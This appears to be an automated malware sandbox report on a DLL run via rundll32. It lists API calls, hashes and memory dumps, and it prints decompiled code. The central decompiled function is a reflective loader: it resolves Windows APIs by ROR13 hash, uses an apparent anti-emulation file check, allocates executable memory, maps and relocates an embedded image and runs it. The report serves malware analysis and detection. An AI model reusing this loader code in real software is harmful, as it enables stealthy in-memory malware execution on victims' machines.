                          • Opcode ID: 7337af9dce9203ad513df6f125a0b9e972b213b9c6b7b543c96de4c7c89fa7eb
                          • Instruction ID: 29594d4a22a5ad3b81cc905e2d424626fc00ced7079ec7568a9ff14fddd7fdff
                          • Opcode Fuzzy Hash: 7337af9dce9203ad513df6f125a0b9e972b213b9c6b7b543c96de4c7c89fa7eb
                          • Instruction Fuzzy Hash: 5C21FBB9605205AF97549FF58880C5B77BDFF40B687004A1FE81897200E730EC808FE2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C57E6, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6E4C5197,?,00000001,?,?,?,6E4C4486,?,?,00000000), ref: 6E4C57FD
                          • GetLastError.KERNEL32(?,6E4C5197,?,00000001,?,?,?,6E4C4486,?,?,00000000,?,?,?,6E4C4A0D,?), ref: 6E4C5809
                            • Part of subcall function 6E4C57CF: CloseHandle.KERNEL32(FFFFFFFE,6E4C5819,?,6E4C5197,?,00000001,?,?,?,6E4C4486,?,?,00000000,?,?), ref: 6E4C57DF
                          • ___initconout.LIBCMT ref: 6E4C5819
                            • Part of subcall function 6E4C5791: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E4C57C0,6E4C5184,?,?,6E4C4486,?,?,00000000,?), ref: 6E4C57A4
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6E4C5197,?,00000001,?,?,?,6E4C4486,?,?,00000000,?), ref: 6E4C582E
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: 5e36b670ebe574879354effe2b33b5d6773c722ec8a949505640e23d7eb341d4
                          • Instruction ID: ff71aa1ef926fe0742ec373126a775cb32cbc8b71335f3ac26eee68d08341d02
                          • Opcode Fuzzy Hash: 5e36b670ebe574879354effe2b33b5d6773c722ec8a949505640e23d7eb341d4
                          • Instruction Fuzzy Hash: F9F0FE36400555FBCF522FE6AC08D8D3F25FF4AAA0F024011FE1996114D6319860DBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C493F, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E4C4089: GetConsoleOutputCP.KERNEL32(A4F87F55,?,00000000,?), ref: 6E4C40EC
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,?,?,6E4C27EE,?), ref: 6E4C4AA8
                          • GetLastError.KERNEL32(?,6E4C27EE,?,}&Ln,00000000,?,00000000,6E4C267D,?,00000000,00000000,6E4F8248,0000002C,6E4C26EE,?), ref: 6E4C4AB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleErrorFileLastOutputWrite
                          • String ID: 'Ln
                          • API String ID: 2915228174-3768261957
                          • Opcode ID: c1d2f186103ea6e060b63086251ad1bbf784ec98e30d2aa44dba6b47eed15d09
                          • Instruction ID: ee534ab9d2223ab9a73f1309e3557b9817a68b6f7023819e9ed6999d66949e5f
                          • Opcode Fuzzy Hash: c1d2f186103ea6e060b63086251ad1bbf784ec98e30d2aa44dba6b47eed15d09
                          • Instruction Fuzzy Hash: 4A61A379D04159AEDF01CFF98944EDEBBB9AF0AB58F00404AE814A7241D372D906CB66
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BD3E0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                          Download Yara Rule
                          APIs
                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E4BD405
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: EncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 2118026453-2084237596
                          • Opcode ID: 9eb22af878f9d15631bab55fd8957f22d619f9b889d039e25fd3dcf3f6c39496
                          • Instruction ID: ba8980abf20df14db5117dd6572c89e9daa18173a818db81c2fc6308fb62bae2
                          • Opcode Fuzzy Hash: 9eb22af878f9d15631bab55fd8957f22d619f9b889d039e25fd3dcf3f6c39496
                          • Instruction Fuzzy Hash: 13415A71900209AFDF05CFE5C981EDE7BB5BF48308F14809AF9196A254D335A951DFA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: rundll32.exe PID: 3112 Parent PID: 4612 rundll32.exeCOMMON

                          Executed Functions

                          Function 6E4B9990, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394filememoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 62%
                          			E6E4B9990(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				intOrPtr _t139;
				struct HDC__* _t144;
				void* _t152;
				signed int _t153;
				void* _t154;
				void* _t164;
				signed int _t167;
				signed int _t169;
				unsigned short _t171;
				void* _t176;
				signed int _t178;
				char _t189;
				void* _t192;
				signed int _t193;
				signed int _t196;
				signed int _t202;
				intOrPtr _t204;
				signed int _t205;
				signed int _t207;
				intOrPtr _t208;
				void* _t209;
				void* _t210;
				signed int _t212;
				signed int _t215;
				intOrPtr _t216;
				intOrPtr* _t219;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed short _t230;
				void* _t235;
				signed int _t236;
				signed int _t237;
				void* _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t249;
				signed int _t250;
				intOrPtr* _t252;
				intOrPtr* _t255;
				intOrPtr* _t256;
				void* _t258;
				intOrPtr* _t260;
				unsigned int _t262;
				intOrPtr* _t264;
				void* _t265;
				void* _t266;
				signed int* _t268;
				signed int _t270;
				signed int _t271;
				intOrPtr* _t273;
				signed int _t277;
				void* _t278;
				signed int _t279;
				void* _t280;
				signed int _t281;
				void* _t283;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed char* _t289;
				intOrPtr _t290;
				signed int _t292;
				void* _t293;
				signed short* _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;

				_t137 =  *0x6e4fa4a4; // 0xf06451cf
				 *(_t299 + 0x4c) = _t137 ^ _t299;
				_t255 =  *((intOrPtr*)(_t299 + 0x64));
				_push(0x400);
				 *((intOrPtr*)(_t299 + 0x2c)) = _t255;
				_t139 = E6E4BA04E(__eflags);
				_t256 =  *_t255;
				_t300 = _t299 + 4;
				_t202 = 0;
				 *((intOrPtr*)(_t300 + 0x2c)) = _t139;
				 *(_t300 + 0x24) = 0;
				 *(_t300 + 0x18) = 0;
				 *(_t300 + 0x20) = 0;
				L1:
				while(1) {
					if( *_t256 != 0x5a4d) {
						L4:
						_t256 = _t256 - 1;
						continue;
					}
					_t216 =  *((intOrPtr*)(_t256 + 0x3c));
					if(_t216 - 0x40 > 0x3bf ||  *((intOrPtr*)(_t216 + _t256)) != 0x4550) {
						goto L4;
					}
					 *((intOrPtr*)(_t300 + 0x14)) = _t256;
					_t292 =  *( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14);
					 *(_t300 + 0x1c) = _t292;
					__eflags = _t292;
					if(_t292 != 0) {
						do {
							_t289 =  *(_t292 + 0x28);
							_t236 = 0;
							__eflags = 0;
							_t250 =  *(_t292 + 0x24) & 0x0000ffff;
							do {
								_t271 =  *_t289 & 0x000000ff;
								asm("ror ecx, 0xd");
								__eflags =  *_t289 - 0x61;
								if( *_t289 >= 0x61) {
									_t236 = _t236 + 0xffffffe0;
									__eflags = _t236;
								}
								_t250 = _t250 + 0xffff;
								_t236 = _t236 + _t271;
								_t289 =  &(_t289[1]);
								__eflags = _t250;
							} while (_t250 != 0);
							__eflags = _t236 - 0x6a4abc5b;
							if(_t236 == 0x6a4abc5b) {
								_t290 =  *((intOrPtr*)(_t292 + 0x10));
								_t298 = 3;
								_t192 =  *((intOrPtr*)( *((intOrPtr*)(_t290 + 0x3c)) + _t290 + 0x78)) + _t290;
								 *(_t300 + 0x10) = _t192;
								_t273 =  *((intOrPtr*)(_t192 + 0x20)) + _t290;
								_t215 =  *((intOrPtr*)(_t192 + 0x24)) + _t290;
								__eflags = _t215;
								do {
									_t252 =  *_t273 + _t290;
									_t193 = 0;
									__eflags = 0;
									_t237 =  *_t252;
									do {
										asm("ror eax, 0xd");
										_t252 = _t252 + 1;
										_t193 = _t193 + _t237;
										_t237 =  *_t252;
										__eflags = _t237;
									} while (_t237 != 0);
									__eflags = _t193 - 0xec0e4e8e;
									if(_t193 == 0xec0e4e8e) {
										L18:
										_t241 =  *((intOrPtr*)( *(_t300 + 0x10) + 0x1c)) + ( *_t215 & 0x0000ffff) * 4;
										__eflags = _t193 - 0xec0e4e8e;
										if(_t193 != 0xec0e4e8e) {
											__eflags = _t193 - 0x7c0dfcaa;
											if(_t193 != 0x7c0dfcaa) {
												__eflags = _t193 - 0x91afca54;
												if(_t193 == 0x91afca54) {
													_t196 =  *((intOrPtr*)(_t241 + _t290)) + 0x57 + _t290;
													__eflags = _t196;
													 *(_t300 + 0x20) = _t196;
												}
											} else {
												 *(_t300 + 0x18) =  *((intOrPtr*)(_t241 + _t290)) + _t290;
											}
										} else {
											 *(_t300 + 0x24) =  *((intOrPtr*)(_t241 + _t290)) + _t290;
										}
										_t298 = _t298 + 0xffff;
										__eflags = _t298;
									} else {
										__eflags = _t193 - 0x7c0dfcaa;
										if(_t193 == 0x7c0dfcaa) {
											goto L18;
										} else {
											__eflags = _t193 - 0x91afca54;
											if(_t193 == 0x91afca54) {
												goto L18;
											}
										}
									}
									_t273 = _t273 + 4;
									_t215 = _t215 + 2;
									__eflags = _t298;
								} while (_t298 != 0);
								_t202 =  *(_t300 + 0x18);
								_t292 =  *(_t300 + 0x1c);
							}
							__eflags =  *(_t300 + 0x24);
							if( *(_t300 + 0x24) == 0) {
								goto L30;
							} else {
								__eflags = _t202;
								if(_t202 == 0) {
									goto L30;
								} else {
									__eflags =  *(_t300 + 0x20);
									if( *(_t300 + 0x20) == 0) {
										goto L30;
									}
								}
							}
							break;
							L30:
							_t292 =  *_t292;
							 *(_t300 + 0x1c) = _t292;
							__eflags = _t292;
						} while (_t292 != 0);
						_t256 =  *((intOrPtr*)(_t300 + 0x14));
					}
					 *((intOrPtr*)(_t300 + 0x34)) = GetDC;
					_t144 = GetDC(0);
					 *(_t300 + 0x3c) = GetWindowRect;
					GetWindowRect(0, _t300 + 0x3c);
					 *((intOrPtr*)(_t300 + 0x40)) = ReleaseDC;
					ReleaseDC(0, _t144);
					_t204 =  *((intOrPtr*)(_t256 + 0x3c)) + _t256;
					 *((intOrPtr*)(_t300 + 0x38)) = _t204;
					CreateFileA("asd", 0, 0, 0, 0, 0, 0);
					 *((intOrPtr*)(_t300 + 0x30)) =  *(_t300 + 0x20) - GetLastError();
					_t152 = VirtualAlloc(0,  *(_t204 + 0x50), 0x3000, 0x40); // executed
					_t243 =  *(_t204 + 0x54);
					_t293 = _t152;
					 *(_t300 + 0x10) = _t293;
					_t219 = _t256;
					__eflags = _t243;
					if(_t243 != 0) {
						_t288 = _t293 - _t256;
						__eflags = _t288;
						do {
							_t189 =  *_t219;
							_t219 = _t219 + 1;
							 *((char*)(_t288 + _t219 - 1)) = _t189;
							_t243 = _t243 - 1;
							__eflags = _t243;
						} while (_t243 != 0);
					}
					_t258 = ( *(_t204 + 0x14) & 0x0000ffff) + _t204;
					_t205 =  *(_t204 + 6) & 0x0000ffff;
					__eflags = _t205;
					if(_t205 != 0) {
						_t270 = _t258 + 0x2c;
						__eflags = _t270;
						do {
							_t205 = _t205 - 1;
							 *((char*)((_t205 & 0x000003ff) +  *((intOrPtr*)(_t300 + 0x2c)))) =  *(_t300 + 0x20);
							_t235 =  *((intOrPtr*)(_t270 - 8)) + _t293;
							_t249 =  *_t270 +  *((intOrPtr*)(_t300 + 0x14));
							_t286 =  *(_t270 - 4);
							__eflags = _t286;
							if(_t286 != 0) {
								do {
									_t235 = _t235 + 1;
									 *((char*)(_t235 - 1)) =  *_t249;
									_t249 = _t249 + 1;
									_t286 = _t286 - 1;
									__eflags = _t286;
								} while (_t286 != 0);
							}
							_t270 = _t270 + 0x28;
							__eflags = _t205;
						} while (_t205 != 0);
					}
					_t207 =  *(_t300 + 0x1c) - 0xffffff80;
					_t260 = _t293 +  *_t207;
					 *((intOrPtr*)(_t300 + 0x14)) = _t260;
					_t153 =  *(_t260 + 0xc);
					__eflags = _t153;
					if(_t153 != 0) {
						while(1) {
							__eflags =  *_t207;
							if( *_t207 == 0) {
								goto L50;
							}
							_t297 =  *((intOrPtr*)(_t300 + 0x28))(_t293 + _t153);
							_t176 =  *(_t300 + 0x10);
							_t285 =  *_t260 + _t176;
							_t268 =  *((intOrPtr*)(_t260 + 0x10)) + _t176;
							__eflags =  *_t268;
							if( *_t268 != 0) {
								asm("o16 nop [eax+eax]");
								do {
									__eflags = _t285;
									if(_t285 == 0) {
										L47:
										_t207 = _t176 +  *_t268;
										__eflags = _t207;
										_t178 =  *(_t300 + 0x20)(_t297, _t207 + 2);
									} else {
										_t230 =  *_t285;
										__eflags = _t230;
										if(_t230 >= 0) {
											goto L47;
										} else {
											_t178 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x3c)) + _t297 + 0x78)) + _t297 + 0x1c)) + ((_t230 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x3c)) + _t297 + 0x78)) + _t297 + 0x10))) * 4 + _t297)) + _t297;
										}
									}
									 *_t268 = _t178;
									_t268 =  &(_t268[1]);
									__eflags = _t285;
									_t84 = _t285 + 4; // 0x4
									_t180 =  ==  ? _t285 : _t84;
									__eflags =  *_t268;
									_t285 =  ==  ? _t285 : _t84;
									_t176 =  *(_t300 + 0x10);
								} while ( *_t268 != 0);
							}
							_t293 =  *(_t300 + 0x10);
							_t260 =  *((intOrPtr*)(_t300 + 0x14)) + 0x14;
							 *((intOrPtr*)(_t300 + 0x14)) = _t260;
							_t153 =  *(_t260 + 0xc);
							__eflags = _t153;
							if(_t153 != 0) {
								continue;
							}
							goto L50;
						}
					}
					L50:
					_t154 =  *((intOrPtr*)(_t300 + 0x34))(0);
					 *(_t300 + 0x3c)(0, _t300 + 0x4c);
					 *((intOrPtr*)(_t300 + 0x40))(0, _t154);
					_t244 =  *(_t300 + 0x1c);
					_t262 = _t293 -  *((intOrPtr*)(_t244 + 0x34));
					__eflags =  *(_t244 + 0xa4);
					if( *(_t244 + 0xa4) != 0) {
						_t225 =  *((intOrPtr*)(_t244 + 0xa0)) + _t293;
						 *(_t300 + 0x18) = _t225;
						_t169 =  *(_t225 + 4);
						__eflags = _t169;
						if(_t169 != 0) {
							do {
								_t100 = _t169 - 8; // -8
								_t283 =  *_t225 + _t293;
								_t212 = _t100 >> 1;
								__eflags = _t212;
								_t296 = _t225 + 8;
								if(_t212 != 0) {
									do {
										_t245 =  *_t296 & 0x0000ffff;
										_t212 = _t212 - 1;
										_t226 = _t245;
										_t171 = _t245 >> 0xc;
										__eflags = _t171 - 0xa;
										if(_t171 != 0xa) {
											__eflags = _t171 - 3;
											if(_t171 != 3) {
												__eflags = _t171 - 1;
												if(_t171 != 1) {
													__eflags = _t171 - 2;
													if(_t171 == 2) {
														_t227 = _t226 & 0x00000fff;
														_t108 = _t227 + _t283;
														 *_t108 =  *(_t227 + _t283) + _t262;
														__eflags =  *_t108;
													}
												} else {
													 *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) + (_t262 >> 0x10);
												}
											} else {
												 *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) + _t262;
											}
										} else {
											 *((intOrPtr*)((_t245 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t245 & 0x00000fff) + _t283)) + _t262;
										}
										_t296 =  &(_t296[1]);
										__eflags = _t212;
									} while (_t212 != 0);
									_t225 =  *(_t300 + 0x18);
									_t169 =  *(_t225 + 4);
								}
								_t293 =  *(_t300 + 0x10);
								_t225 = _t225 + _t169;
								 *(_t300 + 0x18) = _t225;
								_t169 =  *(_t225 + 4);
								__eflags = _t169;
							} while (_t169 != 0);
							_t244 =  *(_t300 + 0x1c);
						}
					}
					 *0x6e4fae08 = _t293;
					_t264 =  *((intOrPtr*)(_t244 + 0x28)) + _t293;
					_t277 =  *( *((intOrPtr*)(_t293 + 0x3c)) + _t293 + 0xc0);
					__eflags = _t277;
					if(_t277 != 0) {
						_t281 =  *(_t277 + _t293 + 0xc);
						__eflags = _t281;
						if(_t281 != 0) {
							_t167 =  *_t281;
							__eflags = _t167;
							while(_t167 != 0) {
								 *_t167(_t293, 1, 0);
								_t167 =  *(_t281 + 4);
								_t281 = _t281 + 4;
								__eflags = _t167;
							}
						}
					}
					_t208 =  *((intOrPtr*)(_t300 + 0x28));
					__eflags =  *(_t208 + 0x1c);
					if( *(_t208 + 0x1c) != 0) {
						 *_t264( *((intOrPtr*)(_t208 + 0x10)), 1, 0);
						goto L77;
					} else {
						_push( *((intOrPtr*)(_t208 + 4)));
						_push(_t293);
						_t279 = E6E4B9850();
						_t300 = _t300 + 8;
						__eflags = _t279;
						if(_t279 == 0) {
							L77:
							_pop(_t265);
							_pop(_t278);
							_pop(_t209);
							__eflags =  *(_t300 + 0x5c) ^ _t300;
							return E6E4BA057( *((intOrPtr*)(_t300 + 0x28)), _t209,  *(_t300 + 0x5c) ^ _t300, _t244, _t265, _t278);
						} else {
							__eflags =  *(_t208 + 0x20);
							if( *(_t208 + 0x20) != 0) {
								E6E4B9920(_t293);
								_t300 = _t300 + 4;
							}
							 *_t264( *((intOrPtr*)(_t208 + 0x10)), 1, 0);
							_t164 =  *_t279( *((intOrPtr*)(_t208 + 0xc)),  *((intOrPtr*)(_t208 + 0x10)),  *((intOrPtr*)(_t208 + 0x14)),  *((intOrPtr*)(_t208 + 0x18)));
							_pop(_t266);
							_pop(_t280);
							_pop(_t210);
							__eflags =  *(_t300 + 0x4c) ^ _t300;
							return E6E4BA057(_t164, _t210,  *(_t300 + 0x4c) ^ _t300, _t244, _t266, _t280);
						}
					}
				}
			}













































































                          0x6e4b9993
                          0x6e4b999a
                          0x6e4b99a2
                          0x6e4b99a6
                          0x6e4b99ab
                          0x6e4b99af
                          0x6e4b99b4
                          0x6e4b99b6
                          0x6e4b99b9
                          0x6e4b99bb
                          0x6e4b99bf
                          0x6e4b99cc
                          0x6e4b99d0
                          0x00000000
                          0x6e4b99d4
                          0x6e4b99d7
                          0x6e4b99ef
                          0x6e4b99ef
                          0x00000000
                          0x6e4b99ef
                          0x6e4b99d9
                          0x6e4b99e4
                          0x00000000
                          0x00000000
                          0x6e4b99f8
                          0x6e4b99ff
                          0x6e4b9a02
                          0x6e4b9a06
                          0x6e4b9a08
                          0x6e4b9a10
                          0x6e4b9a10
                          0x6e4b9a13
                          0x6e4b9a13
                          0x6e4b9a15
                          0x6e4b9a20
                          0x6e4b9a20
                          0x6e4b9a23
                          0x6e4b9a26
                          0x6e4b9a29
                          0x6e4b9a2b
                          0x6e4b9a2b
                          0x6e4b9a2b
                          0x6e4b9a2e
                          0x6e4b9a34
                          0x6e4b9a36
                          0x6e4b9a37
                          0x6e4b9a37
                          0x6e4b9a3c
                          0x6e4b9a42
                          0x6e4b9a48
                          0x6e4b9a4b
                          0x6e4b9a57
                          0x6e4b9a59
                          0x6e4b9a63
                          0x6e4b9a65
                          0x6e4b9a65
                          0x6e4b9a67
                          0x6e4b9a69
                          0x6e4b9a6b
                          0x6e4b9a6b
                          0x6e4b9a6d
                          0x6e4b9a70
                          0x6e4b9a70
                          0x6e4b9a73
                          0x6e4b9a79
                          0x6e4b9a7b
                          0x6e4b9a7d
                          0x6e4b9a7d
                          0x6e4b9a81
                          0x6e4b9a86
                          0x6e4b9a96
                          0x6e4b9aa0
                          0x6e4b9aa3
                          0x6e4b9aa8
                          0x6e4b9ab5
                          0x6e4b9aba
                          0x6e4b9ac7
                          0x6e4b9acc
                          0x6e4b9ad4
                          0x6e4b9ad4
                          0x6e4b9ad6
                          0x6e4b9ad6
                          0x6e4b9abc
                          0x6e4b9ac1
                          0x6e4b9ac1
                          0x6e4b9aaa
                          0x6e4b9aaf
                          0x6e4b9aaf
                          0x6e4b9ada
                          0x6e4b9ada
                          0x6e4b9a88
                          0x6e4b9a88
                          0x6e4b9a8d
                          0x00000000
                          0x6e4b9a8f
                          0x6e4b9a8f
                          0x6e4b9a94
                          0x00000000
                          0x00000000
                          0x6e4b9a94
                          0x6e4b9a8d
                          0x6e4b9ae0
                          0x6e4b9ae3
                          0x6e4b9ae6
                          0x6e4b9ae6
                          0x6e4b9aef
                          0x6e4b9af3
                          0x6e4b9af3
                          0x6e4b9af7
                          0x6e4b9afc
                          0x00000000
                          0x6e4b9afe
                          0x6e4b9afe
                          0x6e4b9b00
                          0x00000000
                          0x6e4b9b02
                          0x6e4b9b02
                          0x6e4b9b07
                          0x00000000
                          0x00000000
                          0x6e4b9b07
                          0x6e4b9b00
                          0x00000000
                          0x6e4b9b09
                          0x6e4b9b09
                          0x6e4b9b0c
                          0x6e4b9b10
                          0x6e4b9b10
                          0x6e4b9b18
                          0x6e4b9b18
                          0x6e4b9b23
                          0x6e4b9b27
                          0x6e4b9b37
                          0x6e4b9b3b
                          0x6e4b9b45
                          0x6e4b9b49
                          0x6e4b9b5a
                          0x6e4b9b61
                          0x6e4b9b65
                          0x6e4b9b83
                          0x6e4b9b87
                          0x6e4b9b89
                          0x6e4b9b8c
                          0x6e4b9b8e
                          0x6e4b9b92
                          0x6e4b9b94
                          0x6e4b9b96
                          0x6e4b9b9a
                          0x6e4b9b9a
                          0x6e4b9ba0
                          0x6e4b9ba0
                          0x6e4b9ba2
                          0x6e4b9ba5
                          0x6e4b9ba9
                          0x6e4b9ba9
                          0x6e4b9ba9
                          0x6e4b9ba0
                          0x6e4b9bb2
                          0x6e4b9bb4
                          0x6e4b9bb8
                          0x6e4b9bba
                          0x6e4b9bbc
                          0x6e4b9bbc
                          0x6e4b9bc0
                          0x6e4b9bc4
                          0x6e4b9bd0
                          0x6e4b9bd8
                          0x6e4b9bda
                          0x6e4b9bde
                          0x6e4b9be1
                          0x6e4b9be3
                          0x6e4b9be5
                          0x6e4b9be7
                          0x6e4b9bea
                          0x6e4b9bed
                          0x6e4b9bf0
                          0x6e4b9bf0
                          0x6e4b9bf0
                          0x6e4b9be5
                          0x6e4b9bf5
                          0x6e4b9bf8
                          0x6e4b9bf8
                          0x6e4b9bc0
                          0x6e4b9c00
                          0x6e4b9c05
                          0x6e4b9c07
                          0x6e4b9c0b
                          0x6e4b9c0e
                          0x6e4b9c10
                          0x6e4b9c16
                          0x6e4b9c16
                          0x6e4b9c19
                          0x00000000
                          0x00000000
                          0x6e4b9c28
                          0x6e4b9c2a
                          0x6e4b9c2e
                          0x6e4b9c33
                          0x6e4b9c35
                          0x6e4b9c38
                          0x6e4b9c3a
                          0x6e4b9c40
                          0x6e4b9c40
                          0x6e4b9c42
                          0x6e4b9c66
                          0x6e4b9c68
                          0x6e4b9c68
                          0x6e4b9c6f
                          0x6e4b9c44
                          0x6e4b9c44
                          0x6e4b9c46
                          0x6e4b9c48
                          0x00000000
                          0x6e4b9c4a
                          0x6e4b9c62
                          0x6e4b9c62
                          0x6e4b9c48
                          0x6e4b9c73
                          0x6e4b9c75
                          0x6e4b9c78
                          0x6e4b9c7a
                          0x6e4b9c7d
                          0x6e4b9c80
                          0x6e4b9c83
                          0x6e4b9c85
                          0x6e4b9c85
                          0x6e4b9c40
                          0x6e4b9c8f
                          0x6e4b9c93
                          0x6e4b9c96
                          0x6e4b9c9a
                          0x6e4b9c9d
                          0x6e4b9c9f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4b9c9f
                          0x6e4b9c16
                          0x6e4b9ca5
                          0x6e4b9ca7
                          0x6e4b9cb4
                          0x6e4b9cbb
                          0x6e4b9cbf
                          0x6e4b9cc5
                          0x6e4b9cc8
                          0x6e4b9ccf
                          0x6e4b9cdb
                          0x6e4b9cdd
                          0x6e4b9ce1
                          0x6e4b9ce4
                          0x6e4b9ce6
                          0x6e4b9cf0
                          0x6e4b9cf2
                          0x6e4b9cf5
                          0x6e4b9cf7
                          0x6e4b9cf7
                          0x6e4b9cf9
                          0x6e4b9cfc
                          0x6e4b9d00
                          0x6e4b9d00
                          0x6e4b9d04
                          0x6e4b9d08
                          0x6e4b9d0a
                          0x6e4b9d0e
                          0x6e4b9d12
                          0x6e4b9d1f
                          0x6e4b9d23
                          0x6e4b9d30
                          0x6e4b9d34
                          0x6e4b9d47
                          0x6e4b9d4b
                          0x6e4b9d4d
                          0x6e4b9d53
                          0x6e4b9d53
                          0x6e4b9d53
                          0x6e4b9d53
                          0x6e4b9d36
                          0x6e4b9d41
                          0x6e4b9d41
                          0x6e4b9d25
                          0x6e4b9d2b
                          0x6e4b9d2b
                          0x6e4b9d14
                          0x6e4b9d1a
                          0x6e4b9d1a
                          0x6e4b9d57
                          0x6e4b9d5a
                          0x6e4b9d5a
                          0x6e4b9d5e
                          0x6e4b9d62
                          0x6e4b9d62
                          0x6e4b9d65
                          0x6e4b9d69
                          0x6e4b9d6b
                          0x6e4b9d6f
                          0x6e4b9d72
                          0x6e4b9d72
                          0x6e4b9d7a
                          0x6e4b9d7a
                          0x6e4b9ce6
                          0x6e4b9d81
                          0x6e4b9d87
                          0x6e4b9d8c
                          0x6e4b9d93
                          0x6e4b9d95
                          0x6e4b9d97
                          0x6e4b9d9b
                          0x6e4b9d9d
                          0x6e4b9d9f
                          0x6e4b9da1
                          0x6e4b9da3
                          0x6e4b9daa
                          0x6e4b9dac
                          0x6e4b9daf
                          0x6e4b9db2
                          0x6e4b9db2
                          0x6e4b9da3
                          0x6e4b9d9d
                          0x6e4b9db6
                          0x6e4b9dba
                          0x6e4b9dbe
                          0x6e4b9e12
                          0x00000000
                          0x6e4b9dc0
                          0x6e4b9dc0
                          0x6e4b9dc3
                          0x6e4b9dc9
                          0x6e4b9dcb
                          0x6e4b9dce
                          0x6e4b9dd0
                          0x6e4b9e14
                          0x6e4b9e1c
                          0x6e4b9e1d
                          0x6e4b9e1f
                          0x6e4b9e20
                          0x6e4b9e2a
                          0x6e4b9dd2
                          0x6e4b9dd2
                          0x6e4b9dd6
                          0x6e4b9dd9
                          0x6e4b9dde
                          0x6e4b9dde
                          0x6e4b9de8
                          0x6e4b9df6
                          0x6e4b9df8
                          0x6e4b9df9
                          0x6e4b9dfb
                          0x6e4b9e00
                          0x6e4b9e0a
                          0x6e4b9e0a
                          0x6e4b9dd0
                          0x6e4b9dbe

                          APIs
                          • CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E4B9B65
                          • GetLastError.KERNEL32 ref: 6E4B9B6B
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 6E4B9B87
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.945815287.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000002.00000002.945810067.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945859706.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945922309.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945930266.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.945936829.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocCreateErrorFileLastVirtual
                          • String ID: asd
                          • API String ID: 1112224254-4170839921
                          • Opcode ID: 1713bb399cf92f508ecbbc33bff30b82480a5719b9a47477d352eec20cf4a702
                          • Instruction ID: 20ca40f995362daf518a9fd15e8c2d02e31face85624ed15232723a49ef1a0d1
